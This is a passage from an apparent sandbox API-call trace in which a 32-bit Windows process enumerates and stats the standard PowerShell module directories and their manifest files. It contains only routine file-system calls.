ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0157.834] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2d1d80, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e2d1d80, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f1e37f4, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x1d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Host.psd1", cAlternateFileName="")) returned 1 [0157.834] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2d1d80, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e2d1d80, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f1e37f4, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x1d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Host.psd1", cAlternateFileName="")) returned 0 [0157.834] FindClose (in: hFindFile=0x5bfe238 | out: hFindFile=0x5bfe238) returned 1 [0157.834] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e37c) returned 1 [0157.834] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e5dc) returned 1 [0157.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\Microsoft.PowerShell.Host.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x6c [0157.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\Microsoft.PowerShell.Host.psd1", nBufferLength=0x6c, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\Microsoft.PowerShell.Host.psd1", lpFilePart=0x0) returned 0x6b [0157.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\Microsoft.PowerShell.Host.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x6c [0157.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\Microsoft.PowerShell.Host.psd1", nBufferLength=0x6c, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\Microsoft.PowerShell.Host.psd1", lpFilePart=0x0) returned 0x6b [0157.834] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e384) returned 1 [0157.834] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\Microsoft.PowerShell.Host.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.host\\microsoft.powershell.host.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25d0270 | out: lpFileInformation=0x25d0270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2d1d80, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e2d1d80, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f1e37f4, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x1d4)) returned 1 [0157.835] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e380) returned 1 [0157.835] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e60c) returned 1 [0157.835] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x53 [0157.835] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", nBufferLength=0x53, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", lpFilePart=0x0) returned 0x52 [0157.835] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\*" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\*"), lpFindFileData=0x5a0e3bc | out: lpFindFileData=0x5a0e3bc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496cfce0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496cfce0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496cfce0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5bfe238 [0157.835] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496cfce0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496cfce0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496cfce0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0157.835] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496cfce0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496cfce0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496cfce0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0157.835] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d7f5920, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8d7f5920, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0xdd1c5fc, ftLastWriteTime.dwHighDateTime=0x1d21d41, nFileSizeHigh=0x0, nFileSizeLow=0x29c5c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataAdapter.ps1", cAlternateFileName="")) returned 1 [0157.835] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fb11da0, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8fb11da0, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0xdd34cbd, ftLastWriteTime.dwHighDateTime=0x1d21d41, nFileSizeHigh=0x0, nFileSizeLow=0x6194, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtils.psd1", cAlternateFileName="")) returned 1 [0157.836] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2d1d80, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e2d1d80, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0xdd34cbd, ftLastWriteTime.dwHighDateTime=0x1d21d41, nFileSizeHigh=0x0, nFileSizeLow=0x4f8a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtils.psm1", cAlternateFileName="")) returned 1 [0157.836] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9598a6c0, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x9598a6c0, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0xde7c0cc, ftLastWriteTime.dwHighDateTime=0x1d21d41, nFileSizeHigh=0x0, nFileSizeLow=0xc94a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtilsHelper.ps1", cAlternateFileName="")) returned 1 [0157.836] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d926420, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8d926420, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0xded8da9, ftLastWriteTime.dwHighDateTime=0x1d21d41, nFileSizeHigh=0x0, nFileSizeLow=0x1ae6b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataV4Adapter.ps1", cAlternateFileName="")) returned 1 [0157.836] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d926420, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8d926420, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0xded8da9, ftLastWriteTime.dwHighDateTime=0x1d21d41, nFileSizeHigh=0x0, nFileSizeLow=0x1ae6b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataV4Adapter.ps1", cAlternateFileName="")) returned 0 [0157.836] FindClose (in: hFindFile=0x5bfe238 | out: hFindFile=0x5bfe238) returned 1 [0157.836] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e37c) returned 1 [0157.836] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e5dc) returned 1 [0157.836] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\microsoft.powershell.odatautils.psd1")) returned 0x20 [0157.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x78 [0157.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1", nBufferLength=0x78, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1", lpFilePart=0x0) returned 0x77 [0157.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x78 [0157.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1", nBufferLength=0x78, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1", lpFilePart=0x0) returned 0x77 [0157.837] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e384) returned 1 [0157.837] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\microsoft.powershell.odatautils.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25d0b7c | out: lpFileInformation=0x25d0b7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fb11da0, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8fb11da0, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0xdd34cbd, ftLastWriteTime.dwHighDateTime=0x1d21d41, nFileSizeHigh=0x0, nFileSizeLow=0x6194)) returned 1 [0157.837] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e380) returned 1 [0157.837] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e60c) returned 1 [0157.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x51 [0157.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security", nBufferLength=0x51, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security", lpFilePart=0x0) returned 0x50 [0157.837] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\*" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.security\\*"), lpFindFileData=0x5a0e3bc | out: lpFindFileData=0x5a0e3bc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x498007e0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x498007e0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x498007e0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5bfe238 [0157.838] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x498007e0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x498007e0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x498007e0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0157.838] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2d1d80, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e2d1d80, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f20f74b, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x2ef, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Security.psd1", cAlternateFileName="")) returned 1 [0157.838] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2d1d80, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e2d1d80, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f20f74b, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x2ef, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Security.psd1", cAlternateFileName="")) returned 0 [0157.838] FindClose (in: hFindFile=0x5bfe238 | out: hFindFile=0x5bfe238) returned 1 [0157.838] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e37c) returned 1 [0157.838] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e5dc) returned 1 [0157.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x74 [0157.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1", nBufferLength=0x74, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1", lpFilePart=0x0) returned 0x73 [0157.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x74 [0157.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1", nBufferLength=0x74, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1", lpFilePart=0x0) returned 0x73 [0157.838] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e384) returned 1 [0157.839] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.security\\microsoft.powershell.security.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25d1314 | out: lpFileInformation=0x25d1314*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2d1d80, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e2d1d80, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f20f74b, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x2ef)) returned 1 [0157.839] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e380) returned 1 [0157.839] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e60c) returned 1 [0157.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4e [0157.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management", nBufferLength=0x4e, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management", lpFilePart=0x0) returned 0x4d [0157.839] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management\\*" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.wsman.management\\*"), lpFindFileData=0x5a0e3bc | out: lpFindFileData=0x5a0e3bc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x498007e0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x498007e0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x498007e0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5bfe238 [0157.839] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x498007e0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x498007e0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x498007e0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0157.839] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f88a640, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8f88a640, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f214576, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x2ea, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.WSMan.Management.psd1", cAlternateFileName="")) returned 1 [0157.839] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f88a640, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8f88a640, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f214576, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x2ea, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.WSMan.Management.psd1", cAlternateFileName="")) returned 0 [0157.840] FindClose (in: hFindFile=0x5bfe238 | out: hFindFile=0x5bfe238) returned 1 [0157.840] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e37c) returned 1 [0157.840] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e5dc) returned 1 [0157.840] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management\\Microsoft.WSMan.Management.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x6e [0157.840] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management\\Microsoft.WSMan.Management.psd1", nBufferLength=0x6e, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management\\Microsoft.WSMan.Management.psd1", lpFilePart=0x0) returned 0x6d [0157.840] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management\\Microsoft.WSMan.Management.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x6e [0157.840] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management\\Microsoft.WSMan.Management.psd1", nBufferLength=0x6e, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management\\Microsoft.WSMan.Management.psd1", lpFilePart=0x0) returned 0x6d [0157.840] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e384) returned 1 [0157.840] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management\\Microsoft.WSMan.Management.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.wsman.management\\microsoft.wsman.management.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25d1a54 | out: lpFileInformation=0x25d1a54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f88a640, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8f88a640, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f214576, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x2ea)) returned 1 [0157.840] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e380) returned 1 [0157.840] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e60c) returned 1 [0157.840] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4f [0157.840] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration", nBufferLength=0x4f, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration", lpFilePart=0x0) returned 0x4e [0157.841] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration\\*" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdesiredstateconfiguration\\*"), lpFindFileData=0x5a0e3bc | out: lpFindFileData=0x5a0e3bc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x497da680, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x497da680, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5bfe238 [0157.841] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x497da680, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x497da680, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0157.841] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: 